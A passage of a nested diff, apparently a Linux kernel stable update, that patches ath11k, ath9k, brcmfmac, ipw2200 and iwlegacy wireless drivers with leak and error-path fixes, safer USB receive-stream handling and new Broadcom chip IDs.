+ 	tfile->sk.sk_sndbuf = INT_MAX;
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index 22460b0abf037..ac34c57e4bc69 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -912,7 +912,6 @@ struct ath11k_base {
+ 	enum ath11k_dfs_region dfs_region;
+ #ifdef CONFIG_ATH11K_DEBUGFS
+ 	struct dentry *debugfs_soc;
+-	struct dentry *debugfs_ath11k;
+ #endif
+ 	struct ath11k_soc_dp_stats soc_stats;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/debugfs.c b/drivers/net/wireless/ath/ath11k/debugfs.c
+index ccdf3d5ba1ab6..5bb6fd17fdf6f 100644
+--- a/drivers/net/wireless/ath/ath11k/debugfs.c
++++ b/drivers/net/wireless/ath/ath11k/debugfs.c
+@@ -976,10 +976,6 @@ int ath11k_debugfs_pdev_create(struct ath11k_base *ab)
+ 	if (test_bit(ATH11K_FLAG_REGISTERED, &ab->dev_flags))
+ 		return 0;
+ 
+-	ab->debugfs_soc = debugfs_create_dir(ab->hw_params.name, ab->debugfs_ath11k);
+-	if (IS_ERR(ab->debugfs_soc))
+-		return PTR_ERR(ab->debugfs_soc);
+-
+ 	debugfs_create_file("simulate_fw_crash", 0600, ab->debugfs_soc, ab,
+ 			    &fops_simulate_fw_crash);
+ 
+@@ -1001,15 +997,51 @@ void ath11k_debugfs_pdev_destroy(struct ath11k_base *ab)
+ 
+ int ath11k_debugfs_soc_create(struct ath11k_base *ab)
+ {
+-	ab->debugfs_ath11k = debugfs_create_dir("ath11k", NULL);
++	struct dentry *root;
++	bool dput_needed;
++	char name[64];
++	int ret;
++
++	root = debugfs_lookup("ath11k", NULL);
++	if (!root) {
++		root = debugfs_create_dir("ath11k", NULL);
++		if (IS_ERR_OR_NULL(root))
++			return PTR_ERR(root);
++
++		dput_needed = false;
++	} else {
++		/* a dentry from lookup() needs dput() once we no longer use it */
++		dput_needed = true;
++	}
++
++	scnprintf(name, sizeof(name), "%s-%s", ath11k_bus_str(ab->hif.bus),
++		  dev_name(ab->dev));
++
++	ab->debugfs_soc = debugfs_create_dir(name, root);
++	if (IS_ERR_OR_NULL(ab->debugfs_soc)) {
++		ret = PTR_ERR(ab->debugfs_soc);
++		goto out;
++	}
++
++	ret = 0;
+ 
+-	return PTR_ERR_OR_ZERO(ab->debugfs_ath11k);
++out:
++	if (dput_needed)
++		dput(root);
++
++	return ret;
+ }
+ 
+ void ath11k_debugfs_soc_destroy(struct ath11k_base *ab)
+ {
+-	debugfs_remove_recursive(ab->debugfs_ath11k);
+-	ab->debugfs_ath11k = NULL;
++	debugfs_remove_recursive(ab->debugfs_soc);
++	ab->debugfs_soc = NULL;
++
++	/* We deliberately do not remove the ath11k directory, even if it
++	 * would be empty. This simplifies the directory handling, and an
++	 * empty ath11k directory left behind in debugfs is only a minor
++	 * cosmetic issue.
++	 */
+ }
+ EXPORT_SYMBOL(ath11k_debugfs_soc_destroy);
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index c5a4c34d77499..e964e1b722871 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -3126,6 +3126,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	if (!peer) {
+ 		ath11k_warn(ab, "failed to find the peer to set up fragment info\n");
+ 		spin_unlock_bh(&ab->base_lock);
++		crypto_free_shash(tfm);
+ 		return -ENOENT;
+ 	}
+ 
+@@ -5022,6 +5023,7 @@ static int ath11k_dp_rx_mon_deliver(struct ath11k *ar, u32 mac_id,
+ 		} else {
+ 			rxs->flag |= RX_FLAG_ALLOW_SAME_PN;
+ 		}
++		rxs->flag |= RX_FLAG_ONLY_MONITOR;
+ 		ath11k_update_radiotap(ar, ppduinfo, mon_skb, rxs);
+ 
+ 		ath11k_dp_rx_deliver_msdu(ar, napi, mon_skb, rxs);
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 99cf3357c66e1..3c6005ab9a717 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -979,7 +979,7 @@ static __maybe_unused int ath11k_pci_pm_suspend(struct device *dev)
+ 	if (ret)
+ 		ath11k_warn(ab, "failed to suspend core: %d\n", ret);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static __maybe_unused int ath11k_pci_pm_resume(struct device *dev)
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 1a2e0c7eeb023..f521dfa2f1945 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -561,11 +561,11 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 			memcpy(ptr, skb->data, rx_remain_len);
+ 
+ 			rx_pkt_len += rx_remain_len;
+-			hif_dev->rx_remain_len = 0;
+ 			skb_put(remain_skb, rx_pkt_len);
+ 
+ 			skb_pool[pool_index++] = remain_skb;
+-
++			hif_dev->remain_skb = NULL;
++			hif_dev->rx_remain_len = 0;
+ 		} else {
+ 			index = rx_remain_len;
+ 		}
+@@ -584,16 +584,21 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 		pkt_len = get_unaligned_le16(ptr + index);
+ 		pkt_tag = get_unaligned_le16(ptr + index + 2);
+ 
++		/* If we encounter an invalid pkt_tag or pkt_len, the
++		 * whole input SKB is considered invalid and dropped;
++		 * any packets already collected in skb_pool are
++		 * dropped, too.
++		 */
+ 		if (pkt_tag != ATH_USB_RX_STREAM_MODE_TAG) {
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		if (pkt_len > 2 * MAX_RX_BUF_SIZE) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: invalid pkt_len (%x)\n", pkt_len);
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		pad_len = 4 - (pkt_len & 0x3);
+@@ -605,11 +610,6 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 
+ 		if (index > MAX_RX_BUF_SIZE) {
+ 			spin_lock(&hif_dev->rx_lock);
+-			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
+-			hif_dev->rx_transfer_len =
+-				MAX_RX_BUF_SIZE - chk_idx - 4;
+-			hif_dev->rx_pad_len = pad_len;
+-
+ 			nskb = __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC);
+ 			if (!nskb) {
+ 				dev_err(&hif_dev->udev->dev,
+@@ -617,6 +617,12 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				spin_unlock(&hif_dev->rx_lock);
+ 				goto err;
+ 			}
++
++			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
++			hif_dev->rx_transfer_len =
++				MAX_RX_BUF_SIZE - chk_idx - 4;
++			hif_dev->rx_pad_len = pad_len;
++
+ 			skb_reserve(nskb, 32);
+ 			RX_STAT_INC(hif_dev, skb_allocated);
+ 
+@@ -654,6 +660,13 @@ err:
+ 				 skb_pool[i]->len, USB_WLAN_RX_PIPE);
+ 		RX_STAT_INC(hif_dev, skb_completed);
+ 	}
++	return;
++invalid_pkt:
++	for (i = 0; i < pool_index; i++) {
++		dev_kfree_skb_any(skb_pool[i]);
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	return;
+ }
+ 
+ static void ath9k_hif_usb_rx_cb(struct urb *urb)
+@@ -1411,8 +1424,6 @@ static void ath9k_hif_usb_disconnect(struct usb_interface *interface)
+ 
+ 	if (hif_dev->flags & HIF_USB_READY) {
+ 		ath9k_htc_hw_deinit(hif_dev->htc_handle, unplugged);
+-		ath9k_hif_usb_dev_deinit(hif_dev);
+-		ath9k_destroy_wmi(hif_dev->htc_handle->drv_priv);
+ 		ath9k_htc_hw_free(hif_dev->htc_handle);
+ 	}
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 07ac88fb1c577..96a3185a96d75 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -988,6 +988,8 @@ void ath9k_htc_disconnect_device(struct htc_target *htc_handle, bool hotunplug)
+ 
+ 		ath9k_deinit_device(htc_handle->drv_priv);
+ 		ath9k_stop_wmi(htc_handle->drv_priv);
++		ath9k_hif_usb_dealloc_urbs((struct hif_device_usb *)htc_handle->hif_dev);
++		ath9k_destroy_wmi(htc_handle->drv_priv);
+ 		ieee80211_free_hw(htc_handle->drv_priv->hw);
+ 	}
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index ca05b07a45e67..fe62ff668f757 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -391,7 +391,7 @@ static void ath9k_htc_fw_panic_report(struct htc_target *htc_handle,
+  * HTC Messages are handled directly here and the obtained SKB
+  * is freed.
+  *
+- * Service messages (Data, WMI) passed to the corresponding
++ * Service messages (Data, WMI) are passed to the corresponding
+  * endpoint RX handlers, which have to free the SKB.
+  */
+ void ath9k_htc_rx_msg(struct htc_target *htc_handle,
+@@ -478,6 +478,8 @@ invalid:
+ 		if (endpoint->ep_callbacks.rx)
+ 			endpoint->ep_callbacks.rx(endpoint->ep_callbacks.priv,
+ 						  skb, epid);
++		else
++			goto invalid;
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index f315c54bd3ac0..19345b8f7bfd5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -341,6 +341,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		wmi->last_seq_id = 0;
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
+index 121893bbaa1d7..8073f31be27d9 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/chip.c
+@@ -726,17 +726,17 @@ static u32 brcmf_chip_tcm_rambase(struct brcmf_chip_priv *ci)
+ 	case BRCM_CC_43664_CHIP_ID:
+ 	case BRCM_CC_43666_CHIP_ID:
+ 		return 0x200000;
++	case BRCM_CC_4355_CHIP_ID:
+ 	case BRCM_CC_4359_CHIP_ID:
+ 		return (ci->pub.chiprev < 9) ? 0x180000 : 0x160000;
+ 	case BRCM_CC_4364_CHIP_ID:
+ 	case CY_CC_4373_CHIP_ID:
+ 		return 0x160000;
+ 	case CY_CC_43752_CHIP_ID:
++	case BRCM_CC_4377_CHIP_ID:
+ 		return 0x170000;
+ 	case BRCM_CC_4378_CHIP_ID:
+ 		return 0x352000;
+-	case CY_CC_89459_CHIP_ID:
+-		return ((ci->pub.chiprev < 9) ? 0x180000 : 0x160000);
+ 	default:
+ 		brcmf_err("unknown chip: %s\n", ci->pub.name);
+ 		break;
+@@ -1426,8 +1426,8 @@ bool brcmf_chip_sr_capable(struct brcmf_chip *pub)
+ 		addr = CORE_CC_REG(base, sr_control1);
+ 		reg = chip->ops->read32(chip->ctx, addr);
+ 		return reg != 0;
++	case BRCM_CC_4355_CHIP_ID:
+ 	case CY_CC_4373_CHIP_ID:
+-	case CY_CC_89459_CHIP_ID:
+ 		/* explicitly check SR engine enable bit */
+ 		addr = CORE_CC_REG(base, sr_control0);
+ 		reg = chip->ops->read32(chip->ctx, addr);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 4a309e5a5707b..f235beaddddba 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -299,6 +299,7 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 			 err);
+ 		goto done;
+ 	}
++	buf[sizeof(buf) - 1] = '\0';
+ 	ptr = (char *)buf;
+ 	strsep(&ptr, "\n");
+ 
+@@ -319,15 +320,17 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	if (err) {
+ 		brcmf_dbg(TRACE, "retrieving clmver failed, %d\n", err);
+ 	} else {
++		buf[sizeof(buf) - 1] = '\0';
+ 		clmver = (char *)buf;
+-		/* store CLM version for adding it to revinfo debugfs file */
+-		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
+ 
+ 		/* Replace all newline/linefeed characters with space
+ 		 * character
+ 		 */
+ 		strreplace(clmver, '\n', ' ');
+ 
++		/* store CLM version for adding it to revinfo debugfs file */
++		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
++
+ 		brcmf_dbg(INFO, "CLM version = %s\n", clmver);
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+index 83ea251cfcecf..f599d5f896e89 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+@@ -336,6 +336,7 @@ static netdev_tx_t brcmf_netdev_start_xmit(struct sk_buff *skb,
+ 			bphy_err(drvr, "%s: failed to expand headroom\n",
+ 				 brcmf_ifname(ifp));
+ 			atomic_inc(&drvr->bus_if->stats.pktcow_failed);
++			dev_kfree_skb(skb);
+ 			goto done;
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+index cec53f934940a..45fbcbdc7d9e4 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+@@ -347,8 +347,11 @@ brcmf_msgbuf_alloc_pktid(struct device *dev,
+ 		count++;
+ 	} while (count < pktids->array_size);
+ 
+-	if (count == pktids->array_size)
++	if (count == pktids->array_size) {
++		dma_unmap_single(dev, *physaddr, skb->len - data_offset,
++				 pktids->direction);
+ 		return -ENOMEM;
++	}
+ 
+ 	array[*idx].data_offset = data_offset;
+ 	array[*idx].physaddr = *physaddr;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index b67f6d0810b6c..a9b9b2dc62d4f 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -51,18 +51,21 @@ enum brcmf_pcie_state {
+ BRCMF_FW_DEF(43602, "brcmfmac43602-pcie");
+ BRCMF_FW_DEF(4350, "brcmfmac4350-pcie");
+ BRCMF_FW_DEF(4350C, "brcmfmac4350c2-pcie");
++BRCMF_FW_CLM_DEF(4355, "brcmfmac4355-pcie");
++BRCMF_FW_CLM_DEF(4355C1, "brcmfmac4355c1-pcie");
+ BRCMF_FW_CLM_DEF(4356, "brcmfmac4356-pcie");
+ BRCMF_FW_CLM_DEF(43570, "brcmfmac43570-pcie");
+ BRCMF_FW_DEF(4358, "brcmfmac4358-pcie");
+ BRCMF_FW_DEF(4359, "brcmfmac4359-pcie");
+-BRCMF_FW_DEF(4364, "brcmfmac4364-pcie");
++BRCMF_FW_CLM_DEF(4364B2, "brcmfmac4364b2-pcie");
++BRCMF_FW_CLM_DEF(4364B3, "brcmfmac4364b3-pcie");
+ BRCMF_FW_DEF(4365B, "brcmfmac4365b-pcie");
+ BRCMF_FW_DEF(4365C, "brcmfmac4365c-pcie");
+ BRCMF_FW_DEF(4366B, "brcmfmac4366b-pcie");
+ BRCMF_FW_DEF(4366C, "brcmfmac4366c-pcie");
+ BRCMF_FW_DEF(4371, "brcmfmac4371-pcie");
++BRCMF_FW_CLM_DEF(4377B3, "brcmfmac4377b3-pcie");
+ BRCMF_FW_CLM_DEF(4378B1, "brcmfmac4378b1-pcie");
+-BRCMF_FW_DEF(4355, "brcmfmac89459-pcie");
+ 
+ /* firmware config files */
+ MODULE_FIRMWARE(BRCMF_FW_DEFAULT_PATH "brcmfmac*-pcie.txt");
+@@ -78,13 +81,16 @@ static const struct brcmf_firmware_mapping brcmf_pcie_fwnames[] = {
+ 	BRCMF_FW_ENTRY(BRCM_CC_4350_CHIP_ID, 0x000000FF, 4350C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4350_CHIP_ID, 0xFFFFFF00, 4350),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43525_CHIP_ID, 0xFFFFFFF0, 4365C),
++	BRCMF_FW_ENTRY(BRCM_CC_4355_CHIP_ID, 0x000007FF, 4355),
++	BRCMF_FW_ENTRY(BRCM_CC_4355_CHIP_ID, 0xFFFFF800, 4355C1), /* rev ID 12/C2 seen */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4356_CHIP_ID, 0xFFFFFFFF, 4356),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43567_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43569_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43570_CHIP_ID, 0xFFFFFFFF, 43570),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4358_CHIP_ID, 0xFFFFFFFF, 4358),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4359_CHIP_ID, 0xFFFFFFFF, 4359),
+-	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0xFFFFFFFF, 4364),
++	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0x0000000F, 4364B2), /* 3 */
++	BRCMF_FW_ENTRY(BRCM_CC_4364_CHIP_ID, 0xFFFFFFF0, 4364B3), /* 4 */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4365_CHIP_ID, 0x0000000F, 4365B),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4365_CHIP_ID, 0xFFFFFFF0, 4365C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4366_CHIP_ID, 0x0000000F, 4366B),
+@@ -92,8 +98,8 @@ static const struct brcmf_firmware_mapping brcmf_pcie_fwnames[] = {
+ 	BRCMF_FW_ENTRY(BRCM_CC_43664_CHIP_ID, 0xFFFFFFF0, 4366C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_43666_CHIP_ID, 0xFFFFFFF0, 4366C),
+ 	BRCMF_FW_ENTRY(BRCM_CC_4371_CHIP_ID, 0xFFFFFFFF, 4371),
++	BRCMF_FW_ENTRY(BRCM_CC_4377_CHIP_ID, 0xFFFFFFFF, 4377B3), /* revision ID 4 */
+ 	BRCMF_FW_ENTRY(BRCM_CC_4378_CHIP_ID, 0xFFFFFFFF, 4378B1), /* revision ID 3 */
+-	BRCMF_FW_ENTRY(CY_CC_89459_CHIP_ID, 0xFFFFFFFF, 4355),
+ };
+ 
+ #define BRCMF_PCIE_FW_UP_TIMEOUT		5000 /* msec */
+@@ -1994,6 +2000,17 @@ static int brcmf_pcie_read_otp(struct brcmf_pciedev_info *devinfo)
+ 	int ret;
+ 
+ 	switch (devinfo->ci->chip) {
++	case BRCM_CC_4355_CHIP_ID:
++		coreid = BCMA_CORE_CHIPCOMMON;
++		base = 0x8c0;
++		words = 0xb2;
++		break;
++	case BRCM_CC_4364_CHIP_ID:
++		coreid = BCMA_CORE_CHIPCOMMON;
++		base = 0x8c0;
++		words = 0x1a0;
++		break;
++	case BRCM_CC_4377_CHIP_ID:
+ 	case BRCM_CC_4378_CHIP_ID:
+ 		coreid = BCMA_CORE_GCI;
+ 		base = 0x1120;
+@@ -2590,6 +2607,7 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4350_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE_SUB(0x4355, BRCM_PCIE_VENDOR_ID_BROADCOM, 0x4355, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4354_RAW_DEVICE_ID, WCC),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4355_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4356_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43567_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43570_DEVICE_ID, WCC),
+@@ -2600,7 +2618,7 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_2G_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_5G_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_43602_RAW_DEVICE_ID, WCC),
+-	BRCMF_PCIE_DEVICE(BRCM_PCIE_4364_DEVICE_ID, BCA),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4364_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_2G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4365_5G_DEVICE_ID, BCA),
+@@ -2609,9 +2627,10 @@ static const struct pci_device_id brcmf_pcie_devid_table[] = {
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4366_2G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4366_5G_DEVICE_ID, BCA),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4371_DEVICE_ID, WCC),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_43596_DEVICE_ID, CYW),
++	BRCMF_PCIE_DEVICE(BRCM_PCIE_4377_DEVICE_ID, WCC),
+ 	BRCMF_PCIE_DEVICE(BRCM_PCIE_4378_DEVICE_ID, WCC),
+-	BRCMF_PCIE_DEVICE(CY_PCIE_89459_DEVICE_ID, CYW),
+-	BRCMF_PCIE_DEVICE(CY_PCIE_89459_RAW_DEVICE_ID, CYW),
++
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h b/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
+index f4939cf627672..896615f579522 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
++++ b/drivers/net/wireless/broadcom/brcm80211/include/brcm_hw_ids.h
+@@ -37,6 +37,7 @@
+ #define BRCM_CC_4350_CHIP_ID		0x4350
+ #define BRCM_CC_43525_CHIP_ID		43525
+ #define BRCM_CC_4354_CHIP_ID		0x4354
++#define BRCM_CC_4355_CHIP_ID		0x4355
+ #define BRCM_CC_4356_CHIP_ID		0x4356
+ #define BRCM_CC_43566_CHIP_ID		43566
+ #define BRCM_CC_43567_CHIP_ID		43567
+@@ -51,12 +52,12 @@
+ #define BRCM_CC_43664_CHIP_ID		43664
+ #define BRCM_CC_43666_CHIP_ID		43666
+ #define BRCM_CC_4371_CHIP_ID		0x4371
++#define BRCM_CC_4377_CHIP_ID		0x4377
+ #define BRCM_CC_4378_CHIP_ID		0x4378
+ #define CY_CC_4373_CHIP_ID		0x4373
+ #define CY_CC_43012_CHIP_ID		43012
+ #define CY_CC_43439_CHIP_ID		43439
+ #define CY_CC_43752_CHIP_ID		43752
+-#define CY_CC_89459_CHIP_ID		0x4355
+ 
+ /* USB Device IDs */
+ #define BRCM_USB_43143_DEVICE_ID	0xbd1e
+@@ -72,6 +73,7 @@
+ #define BRCM_PCIE_4350_DEVICE_ID	0x43a3
+ #define BRCM_PCIE_4354_DEVICE_ID	0x43df
+ #define BRCM_PCIE_4354_RAW_DEVICE_ID	0x4354
++#define BRCM_PCIE_4355_DEVICE_ID	0x43dc
+ #define BRCM_PCIE_4356_DEVICE_ID	0x43ec
+ #define BRCM_PCIE_43567_DEVICE_ID	0x43d3
+ #define BRCM_PCIE_43570_DEVICE_ID	0x43d9
+@@ -90,9 +92,9 @@
+ #define BRCM_PCIE_4366_2G_DEVICE_ID	0x43c4
+ #define BRCM_PCIE_4366_5G_DEVICE_ID	0x43c5
+ #define BRCM_PCIE_4371_DEVICE_ID	0x440d
++#define BRCM_PCIE_43596_DEVICE_ID	0x4415
++#define BRCM_PCIE_4377_DEVICE_ID	0x4488
+ #define BRCM_PCIE_4378_DEVICE_ID	0x4425
+-#define CY_PCIE_89459_DEVICE_ID         0x4415
+-#define CY_PCIE_89459_RAW_DEVICE_ID     0x4355
+ 
+ /* brcmsmac IDs */
+ #define BCM4313_D11N2G_ID	0x4727	/* 4313 802.11n 2.4G device */
+diff --git a/drivers/net/wireless/intel/ipw2x00/ipw2200.c b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+index ca802af8cddcc..d382f20173256 100644
+--- a/drivers/net/wireless/intel/ipw2x00/ipw2200.c
++++ b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+@@ -3427,7 +3427,7 @@ static void ipw_rx_queue_reset(struct ipw_priv *priv,
+ 			dma_unmap_single(&priv->pci_dev->dev,
+ 					 rxq->pool[i].dma_addr,
+ 					 IPW_RX_BUF_SIZE, DMA_FROM_DEVICE);
+-			dev_kfree_skb(rxq->pool[i].skb);
++			dev_kfree_skb_irq(rxq->pool[i].skb);
+ 			rxq->pool[i].skb = NULL;
+ 		}
+ 		list_add_tail(&rxq->pool[i].list, &rxq->rx_used);
+@@ -11383,9 +11383,14 @@ static int ipw_wdev_init(struct net_device *dev)
+ 	set_wiphy_dev(wdev->wiphy, &priv->pci_dev->dev);
+ 
+ 	/* With that information in place, we can now register the wiphy... */
+-	if (wiphy_register(wdev->wiphy))
+-		rc = -EIO;
++	rc = wiphy_register(wdev->wiphy);
++	if (rc)
++		goto out;
++
++	return 0;
+ out:
++	kfree(priv->ieee->a_band.channels);
++	kfree(priv->ieee->bg_band.channels);
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlegacy/3945-mac.c b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+index d7e99d50b287b..9eaf5ec133f9e 100644
+--- a/drivers/net/wireless/intel/iwlegacy/3945-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+@@ -3372,10 +3372,12 @@ static DEVICE_ATTR(dump_errors, 0200, NULL, il3945_dump_error_log);
+  *
+  *****************************************************************************/
+ 
+-static void
++static int
+ il3945_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -3392,6 +3394,8 @@ il3945_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il3945_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -3712,7 +3716,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	}
+ 
+ 	il_set_rxon_channel(il, &il->bands[NL80211_BAND_2GHZ].channels[5]);
+-	il3945_setup_deferred_work(il);
++	err = il3945_setup_deferred_work(il);
++	if (err)
++		goto out_remove_sysfs;
++
+ 	il3945_setup_handlers(il);
+ 	il_power_initialize(il);
+ 
+@@ -3724,7 +3731,7 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	err = il3945_setup_mac(il);
+ 	if (err)
+-		goto out_remove_sysfs;
++		goto out_destroy_workqueue;
+ 
+ 	il_dbgfs_register(il, DRV_NAME);
+ 
+@@ -3733,9 +3740,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
+-out_remove_sysfs:
++out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_remove_sysfs:
+ 	sysfs_remove_group(&pdev->dev.kobj, &il3945_attribute_group);
+ out_release_irq:
+ 	free_irq(il->pci_dev->irq, il);
+diff --git a/drivers/net/wireless/intel/iwlegacy/4965-mac.c b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+index 721b4042b4bf7..4d3c544ff2e66 100644
+--- a/drivers/net/wireless/intel/iwlegacy/4965-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+@@ -6211,10 +6211,12 @@ out:
